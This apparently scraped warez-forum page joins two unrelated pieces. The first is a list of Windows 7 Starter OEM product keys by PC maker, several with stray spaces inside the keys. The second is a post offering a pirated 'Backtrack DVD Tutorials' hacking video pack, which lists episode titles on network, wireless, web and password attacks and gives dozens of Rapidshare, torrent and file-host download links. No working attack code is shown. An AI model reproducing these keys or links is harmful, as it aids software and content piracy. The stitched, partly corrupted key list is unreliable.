7|Starter|Asus|6K6WB-X73TD-KG7 94-FJYHG-YCJVG
7|Starter|Casper ERA|6PB94-MC2C6-4F37H-KTJ32-PF 2PT
7|Starter|Crea|4FQRW-9R6H7-6P4 9K-2QKW6-WVK46
7|Starter|Dell|36Q3Y-BBT84-MGJ 3H-FT7VD-FG72J
7|Starter|Excimer|BHP4B-MXP9G- RG7KQ-T8R84-CW3D3
7|Starter|Exper|4FRH4-WQDGJ-M9 HRY-K73D8-RGT3C
7|Starter|Fujitsu|PMXH9-M23P9- QJJMB-2FWRC-7CDKP
7|Starter|Hannspree|BRFCY-XMXR V-28JHQ-F6D9B-BV73C
7|Starter|HP|RH98C-M9PW4-6DHR7 -X99PJ-3FGDB
7|Starter|KSystems|6KTVJ-RY667 -X3Q9J-26MXJ-KKWT8
7|Starter|Lenovo|273P4-GQ8V6-9 7YYM-9YTHF-DC2VP
7|Starter|LG|2V3W2-JXTTR-28RD8 -R228D-KR69C
7|Starter|Medion|2K8WH-JVQDM-C 9HVC-YR2XC-8M76G
7|Starter|MSI|2W4DJ-JFFJV-DMCP P-2C3X8-883DP
7|Starter|Nokia|2XGHP-9TQK2-8C F28-BM2P2-8FRX8
7|Starter|Olidata|344HQ-3YHDT- C7VCT-BDPBV-4KTR3
7|Starter|Sony|32J2V-TGQCY-9QJ XP-Q3FVT-X8BQ7
7|Starter|Stone|4BBMG-9W3GV-W4 8DD-KX6MB-XMMMK
7|Starter|Tarox|6RVFM-RTMTJ-4D GWV-TXTQW-7GFFB
7|Starter|Toshiba|TGBKB-9KBGJ- 3Y3J6-K8M2F-J2HJQ
7|Starter|Viewsonic|6TQ9G-QB2W K-FM2TB-CKBDP-9D6HM
7|Starter|Viliv|7W842-2HCPJ-BC 3MJ-B79K6-TD2HQ
7|Starter|Zoostorm|6JPKB-P8D84 -6DT8D-P2QHB-QMKP9
7|StarterE|HP|C3HY9-34XKR-6Y9Y9-RB7TR-84KWG

Backtrack DVD Tutorials

Backtrack DVD Tutorials | 5.63 GB

Include:
Installing Backtrack 3

Episode 1 – Network Hacking – Arp Poisoning
Episode 2 – Wireless Hacking – Cracking WEP
Episode 3 – Wireless Hacking – DeAuth
Episode 5 – Lock Picking – Bump Key
Episode 6 – Phone Phreaking – Beige Box
Episode 7 – Phone Phreaking/Network Hacking – Sniffing VOIP
Episode 8 – Lock Picking – DIY Padlock Shims
Episode 9 – Lock Picking – Mult-Disc Combo Locks
Episode 10 – Hacking Basics – MD5
Episode 11 – Website Hacking – Sql Injection
Episode 12 – Hacking Basics – Backtrack
Episode 13 – Website Hacking – XSS
Episode 14 – Staying Secure – SSH Tunnel
Episode 15 – Modding – Xbox Softmod
Episode 16 – Wireless Hacking – Cracking WPA
Episode 17 – Triple Boot – Windows, Backtrack, & Ubuntu
Episode 18 – Local Password Cracking
Episode 19 – Lock Picking Basics
Episode 20 – Ettercap
Episode 21 – XSS Tunnel
Episode 22 – Playstation 2 Softmod
Episode 23 – Cracking WEP Update
Episode 24 – Bypass Hotspot’s Access Controls

Underground – Install Backtrack 3 on USB
Underground – CSRF(Cross Site Request Forgery)
Underground – Alternate Data Streams
Underground – Local File Inclusion
Underground – Windows Privilege Escalation
Underground – Bluetooth Hacking
Underground – VMWare
Underground – Fix Google Mail Enumerator
Underground – Home Made Lock Picks
Underground – Downfalls of Anti-Virus Software Part 2
Underground – Downfalls of Anti-Virus Software
Underground – Evilgrade
Underground – Trojan Basics
Underground – Manipulating Windows User Accounts
Underground – Combine Files
Underground – Password Phishing
Underground – Windows SMB Relay Exploit
Underground – Application Patching
Underground – Metasploit Autopwn
Underground – Email Spoofing
Underground – Introduction
Extracting Database Information from Information_Schema
FPGA MD5 Cracker
Arduino ARP Cop
Email Injection
Ping of Death
DNS Spoofing with Virtual Hosts
Bypass Cisco Clean Access & Cisco NAC Appliance
Dual Boot – Windows & Backtrack
Sql Injection Challenge How-to
How to use Intel Pro/Wireless 3945ABG in Backtrack 2
Local Privilege Escalation Vulnerability in Cisco VPN Client





Rapidshare:

Code:
http://rapidshare.com/files/338076046/Backtrack_Tutorials-.part01.rar
http://rapidshare.com/files/338076129/Backtrack_Tutorials-.part02.rar
http://rapidshare.com/files/338076480/Backtrack_Tutorials-.part03.rar
http://rapidshare.com/files/338076529/Backtrack_Tutorials-.part04.rar
http://rapidshare.com/files/338076800/Backtrack_Tutorials-.part05.rar
http://rapidshare.com/files/338076825/Backtrack_Tutorials-.part06.rar
http://rapidshare.com/files/338077192/Backtrack_Tutorials-.part07.rar
http://rapidshare.com/files/338077165/Backtrack_Tutorials-.part08.rar
http://rapidshare.com/files/338077537/Backtrack_Tutorials-.part09.rar
http://rapidshare.com/files/338077540/Backtrack_Tutorials-.part10.rar
http://rapidshare.com/files/338078025/Backtrack_Tutorials-.part11.rar
http://rapidshare.com/files/338077982/Backtrack_Tutorials-.part12.rar
http://rapidshare.com/files/338078403/Backtrack_Tutorials-.part13.rar
http://rapidshare.com/files/338078350/Backtrack_Tutorials-.part14.rar
http://rapidshare.com/files/338078672/Backtrack_Tutorials-.part15.rar
http://rapidshare.com/files/338108431/Backtrack_Tutorials-.part16.rar
http://rapidshare.com/files/338108471/Backtrack_Tutorials-.part17.rar
http://rapidshare.com/files/338108711/Backtrack_Tutorials-.part18.rar
http://rapidshare.com/files/338108802/Backtrack_Tutorials-.part19.rar
http://rapidshare.com/files/338109083/Backtrack_Tutorials-.part20.rar
http://rapidshare.com/files/338109216/Backtrack_Tutorials-.part21.rar
http://rapidshare.com/files/338109458/Backtrack_Tutorials-.part22.rar
http://rapidshare.com/files/338109711/Backtrack_Tutorials-.part23.rar
http://rapidshare.com/files/338110163/Backtrack_Tutorials-.part24.rar
http://rapidshare.com/files/338110160/Backtrack_Tutorials-.part25.rar
http://rapidshare.com/files/338110519/Backtrack_Tutorials-.part26.rar
http://rapidshare.com/files/338110506/Backtrack_Tutorials-.part27.rar
http://rapidshare.com/files/338111099/Backtrack_Tutorials-.part28.rar
http://rapidshare.com/files/338111007/Backtrack_Tutorials-.part29.rar
http://rapidshare.com/files/338111350/Backtrack_Tutorials-.part30.rar
http://rapidshare.com/files/338111532/Backtrack_Tutorials-.part31.rar
http://rapidshare.com/files/338111808/Backtrack_Tutorials-.part32.rar
http://rapidshare.com/files/338111894/Backtrack_Tutorials-.part33.rar
http://rapidshare.com/files/338112211/Backtrack_Tutorials-.part34.rar
http://rapidshare.com/files/338112320/Backtrack_Tutorials-.part35.rar
http://rapidshare.com/files/338112552/Backtrack_Tutorials-.part36.rar
http://rapidshare.com/files/338112679/Backtrack_Tutorials-.part37.rar
http://rapidshare.com/files/338113007/Backtrack_Tutorials-.part38.rar
http://rapidshare.com/files/338112892/Backtrack_Tutorials-.part39.rar



http://thepiratebay.sx/torrent/5542032/




http://torrentz.eu/66cf21bead7dbdc84ff2d641762e8a7cbf90305e



http://uploaded.net/file/2aodnydi

http://tutolearning.com/backtrack-hacking-tutorials-full-collection-4-dvd-and-bonus/

http://tutolearning.com/category/computer-network-security/


http://www.cbtnuggets.com/it-training-videos/series/cbtn_backtrack_sec














WebRepOverall rating